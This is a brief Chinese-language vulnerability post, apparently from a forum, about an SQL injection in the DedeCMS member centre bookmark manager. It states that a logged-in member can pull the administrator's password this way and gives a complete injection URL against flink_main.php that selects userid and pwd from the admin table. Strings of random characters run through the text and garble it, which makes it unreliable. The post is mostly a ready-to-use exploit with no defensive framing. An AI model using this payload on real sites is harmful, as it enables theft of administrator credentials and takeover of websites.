DedeCMS会员中心SQL注射漏洞1 O: v+ Z: k0 S8 I& I6 z. S9 _/ G/ H
需要magic_quotes_gpc = Off8 f* T% P+ Y; Y* T1 K5 x/ V
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码.
2 {3 T: F5 [% J: f2 A5 ^0 y
$ r, C5 I+ J4 Y- Q# r1 `/ XDedeCMS会员中心书签管理SQL注射漏洞
7 Y8 Z* K+ ~% ~( |成功利用该漏洞可获得管理员密码! ^4 F& O( v7 w
) x3 f. R0 N* |" |+ C, t" Q9 F/ V- a
会员登录后可以执行SQL语句查询数据库任意内容如管理员密码
. Z$ u$ ~# |( y2 j: R3 w ' T x$ u1 A! [; ]+ Y: R b5 G
http://bt/member/flink_main.php?dopost=update&aid=1&title=c4rp3nt3r&url=http://www.0x50sec.org',title=@`'`,url=(select concat(userid,0x3a,pwd) from `%23@__admin` limit 1),title='c4rp3nt3r
) F5 S E |( k |